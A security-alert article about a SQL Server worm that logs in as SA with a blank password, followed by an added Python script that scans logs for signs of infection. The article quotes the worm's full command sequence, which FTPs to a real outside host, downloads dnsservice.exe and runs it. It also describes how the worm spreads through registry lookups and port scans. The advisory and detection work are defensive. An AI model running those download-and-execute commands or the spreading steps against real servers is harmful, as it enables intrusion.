SQLServerCentral Article

Security Alert : SQL Server Worm Virus Attacking Systems


The virus community has moved its targets to SQL Server over the past few days as a new worm began attacking vulnerable SQL Servers. The exploit targets servers running in mixed mode (SQL Server and Windows authentication) that have no password set for the SA account. (Note: if your server uses Windows authentication only, SQL logins such as SA cannot be used to connect and this worm cannot get in.) While this version of the worm may not spread very quickly, it is a warning of what this type of exploit could do in the future.

The worm begins by logging into your server from another infected machine as SA with no password. Once connected, it issues the following operating-system commands (xp_cmdshell gives the SA login a command shell on the server):

ftp 207.29.192.160

user = ftp

password = foo.com

bin

cd pub

cd tmp

get dnsservice.exe

close

quit

start dnsservice.exe

This sequence pulls a file down from the FTP server at 207.29.192.160, logging in with the user name ftp and the password foo.com. The dnsservice.exe file it fetches has since been removed from the FTP site, but the worm may be able to repoint itself to another server. Once the download completes, the worm starts dnsservice.exe and cleans up after itself using xp_cmdshell commands.

It then checks in with an IRC (chat) server. One can only assume this was the creator's way of gauging how successful the worm was.

The worm then reads the following registry keys (under HKEY_LOCAL_MACHINE) to find out which other SQL Servers this machine knows about, and moves on to infect each one it finds. These keys hold the client-side connection settings for SQL Server on the machine: the network libraries and the server aliases configured through the Client Network Utility, the same client settings Enterprise Manager uses to reach the servers registered in it:

SOFTWARE\Microsoft\MSSQLServer\Client\SuperSocketNetLib\

SOFTWARE\Microsoft\MSSQLServer\Client\ConnectTo\

On top of infecting the servers it finds there, it starts a port scan to find other SQL Servers it can reach. One of the more alarming aspects of this worm is that it broadcasts some of your server information through a public IRC channel.
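The behaviour described above leaves traces in three places you can check: the SQL Server error log (a remote SQL-authenticated SA login), the firewall or egress log (an FTP session to 207.29.192.160, an IRC check-in, and a sweep of port 1433 looking for more victims), and the process list (dnsservice.exe running). The Python script below is an added example, not code from the original article or from the worm itself; it runs those checks over constructed sample logs. The IRC ports (6667-6669), the log line formats, the sample addresses and the scan threshold are assumptions, since the article names none of them; the drop-server IP, the dropper file name and port 1433 (the default SQL Server TCP port) are the only values taken as given.

```python
import re
from collections import defaultdict

# Indicators taken from the article above.
DROP_SERVER_IP = "207.29.192.160"
DROPPER_FILE = "dnsservice.exe"
SQL_PORT = 1433                  # default SQL Server TCP port
# ASSUMPTIONS (the article names neither the IRC server nor its port, nor any
# log format): conventional IRC ports, and a source that touches this many
# distinct hosts on 1433 is treated as a scanner.
IRC_PORTS = {6667, 6668, 6669}
SCAN_THRESHOLD = 5

# Constructed sample: SQL Server 2000 error-log lines with login auditing on.
ERRORLOG = """\
2001-11-21 03:14:05.12 logon     Login succeeded for user 'sa'. Connection: Non-Trusted. [CLIENT: 10.0.0.20]
2001-11-21 03:14:06.01 logon     Login succeeded for user 'CORP\\alice'. Connection: Trusted. [CLIENT: 10.0.0.5]
2001-11-21 03:14:06.50 logon     Login succeeded for user 'sa'. Connection: Non-Trusted. [CLIENT: <local machine>]
"""

# Constructed sample: firewall log as "time action proto src:port dst:port".
FWLOG = """\
2001-11-21 03:14:07 ALLOW TCP 10.0.0.20:1087 207.29.192.160:21
2001-11-21 03:14:09 ALLOW TCP 10.0.0.20:1088 207.29.192.160:20
2001-11-21 03:14:15 ALLOW TCP 10.0.0.20:1090 198.51.100.9:6667
2001-11-21 03:14:20 ALLOW TCP 10.0.0.20:1091 10.0.0.31:1433
2001-11-21 03:14:20 ALLOW TCP 10.0.0.20:1092 10.0.0.32:1433
2001-11-21 03:14:21 DROP  TCP 10.0.0.20:1093 10.0.0.33:1433
2001-11-21 03:14:21 DROP  TCP 10.0.0.20:1094 10.0.0.34:1433
2001-11-21 03:14:22 ALLOW TCP 10.0.0.20:1095 10.0.0.35:1433
2001-11-21 03:14:30 ALLOW TCP 10.0.0.5:2011  10.0.0.31:1433
"""

# Constructed sample: image names from a process listing on the server.
PROCESSES = ["sqlservr.exe", "cmd.exe", "DNSSERVICE.EXE"]

LOGIN_RE = re.compile(
    r"Login succeeded for user '(?P<user>[^']+)'\. "
    r"Connection: (?P<conn>Trusted|Non-Trusted)\. \[CLIENT: (?P<client>[^\]]+)\]")
FW_RE = re.compile(
    r"^(?P<ts>\S+ \S+)\s+(?P<action>\w+)\s+(?P<proto>\w+)\s+"
    r"(?P<src>[\d.]+):(?P<sport>\d+)\s+(?P<dst>[\d.]+):(?P<dport>\d+)")


def hunt_errorlog(text):
    """A SQL-authenticated (Non-Trusted) 'sa' login from a remote client is the
    worm's entry point; local sa logins are left alone to cut noise."""
    hits = []
    for line in text.splitlines():
        m = LOGIN_RE.search(line)
        if m and m["user"].lower() == "sa" and m["conn"] == "Non-Trusted" \
                and m["client"] != "<local machine>":
            hits.append(("remote-sa-login", m["client"]))
    return hits


def hunt_fwlog(text):
    """Flag the download from the drop server, the IRC check-in, and any source
    sweeping port 1433 across many hosts (the worm's hunt for new victims)."""
    hits = []
    sql_targets = defaultdict(set)
    for line in text.splitlines():
        m = FW_RE.match(line)
        if not m:
            continue
        src, dst, dport = m["src"], m["dst"], int(m["dport"])
        if dst == DROP_SERVER_IP:
            hits.append(("dropper-ftp", f"{src} -> {dst}:{dport}"))
        elif dport in IRC_PORTS:
            hits.append(("irc-checkin", f"{src} -> {dst}:{dport}"))
        elif dport == SQL_PORT:
            sql_targets[src].add(dst)      # counted whether allowed or dropped
    for src, targets in sql_targets.items():
        if len(targets) >= SCAN_THRESHOLD:
            hits.append(("sql-port-scan", f"{src} -> {len(targets)} hosts on {SQL_PORT}"))
    return hits


def hunt_processes(names):
    """The dropper is started by name, so a running image called dnsservice.exe
    (case-insensitive) is a strong sign the payload is active."""
    return [("dropper-running", n) for n in names if n.lower() == DROPPER_FILE]


def hunt(errorlog=ERRORLOG, fwlog=FWLOG, processes=PROCESSES):
    """Run every hunt and return (indicator, detail) pairs in log order."""
    return hunt_errorlog(errorlog) + hunt_fwlog(fwlog) + hunt_processes(processes)


if __name__ == "__main__":
    for kind, detail in hunt():
        print(f"{kind:16} {detail}")
```

Run it as-is to see the six hits the constructed samples produce, then point the functions at your own exported error log and firewall log. The dropped 1433 connections are counted on purpose: a scanner that is blocked by the firewall still shows up as a scanner, which is exactly the infected workstation behind the firewall that the article warns about. Remote SA logins only appear in the error log if login auditing is turned on, so enable it before relying on that check.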

Do not expect a patch from Microsoft for this worm. It exploits no Microsoft vulnerability; it only infects servers where the SA password is blank (NULL). Keep in mind that this worm is not limited to servers exposed on the Internet. For example, if I have Personal Edition of SQL Server installed on a workstation with Internet access, that workstation can be infected and then act as a gateway to the firewall-protected servers on my private network.

This worm hasn't picked up much steam yet, and I don't see this version of the virus ever. But future releases that don't rely on public FTP sites or IRC may be a greater threat. If you still have a SQL Server installed anywhere on your network with a blank SA password, let this serve as your warning shot across the bow. Future worms like this may not be so easy to stop.
